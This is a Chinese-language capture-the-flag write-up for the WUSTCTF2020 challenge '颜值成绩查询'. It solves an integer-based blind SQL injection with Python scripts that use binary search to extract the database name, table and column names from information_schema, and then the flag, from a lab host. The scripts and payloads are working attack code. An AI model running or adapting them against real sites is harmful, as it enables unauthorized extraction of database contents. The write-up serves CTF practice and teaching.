• [WUSTCTF2020]颜值成绩查询

    [WUSTCTF2020]颜值成绩查询

    整数型注入,盲注。

    速度快,一定要二分法。

    爆库名:ctf

    二分法核心payload

    "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i , mid)

    import requests
url = "http://8a12a75e-26f1-4a40-ad74-95086cfef9df.node3.buuoj.cn/?stunum="

result = ""
i = 0

while( True ):
	i = i + 1 
	head=32
	tail=127

	while( head < tail ):
		mid = (head + tail) >> 1

		payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid)
		r = requests.get(url+payload)
		r.encoding = "utf-8"
		#print(url+payload)
		if "your score is: 100" in r.text :
			head = mid + 1
		else:
			#print(r.text)
			tail = mid
	
	last = result
	
	if head!=32:
		result += chr(head)
	else:
		break
	print(result)

    回显结果参考下图:

    image-20200414224348796

    爆表

    flag,score

    import requests
url = "http://8a12a75e-26f1-4a40-ad74-95086cfef9df.node3.buuoj.cn/?stunum="

result = ""
i = 0

while( True ):
	i = i + 1 
	head=32
	tail=127

	while( head < tail ):
		mid = (head + tail) >> 1

		#payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid)
		payload = "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i , mid)

		r = requests.get(url+payload)
		r.encoding = "utf-8"
		#print(url+payload)
		if "your score is: 100" in r.text :
			head = mid + 1
		else:
			#print(r.text)
			tail = mid
	
	last = result
	
	if head!=32:
		result += chr(head)
	else:
		break
	print(result)

    回显结果参考下图:

    image-20200414224405361

    爆列名

    爆出flag和value两个字段

    import requests
url = "http://8a12a75e-26f1-4a40-ad74-95086cfef9df.node3.buuoj.cn/?stunum="

result = ""
i = 0

while( True ):
	i = i + 1 
	head=32
	tail=127

	while( head < tail ):
		mid = (head + tail) >> 1

		#payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid)
		#payload = "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i , mid)
		payload = "if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flag')),%d,1))>%d,1,0)" % (i , mid)

		r = requests.get(url+payload)
		r.encoding = "utf-8"
		#print(url+payload)
		if "your score is: 100" in r.text :
			head = mid + 1
		else:
			#print(r.text)
			tail = mid
	
	last = result
	
	if head!=32:
		result += chr(head)
	else:
		break
	print(result)

    image-20200414224752972

    爆信息

    flag表中有flag和value两个字段

    爆flag字段

    爆的时候结果如下,没有给flag猜测是在value字段。

    image-20200414225005339

    爆value字段,发现就是在value字段了。如果没有的画要爆一下别的。

    还有啊二分法,一定要二分法。不然,遇到某些题可能你爆完比赛也结束了。

    image-20200414225212551
  • 相关阅读:
    7深入FDOFDO概念
    IP 地址输入控件
    如何在设计时公开复合控件内的子控件
    Hello! CnBlogs... ...
    十句话,我竟然看了好久
    Linux下剪切命令
    Linux下拷贝命令
    Linux下新建文件夹命令
    Linux下*.tar.gz文件解压缩命令
    项目管理四条转载
  • 原文地址:https://www.cnblogs.com/h3zh1/p/12702001.html
Copyright © 2020-2023  润新知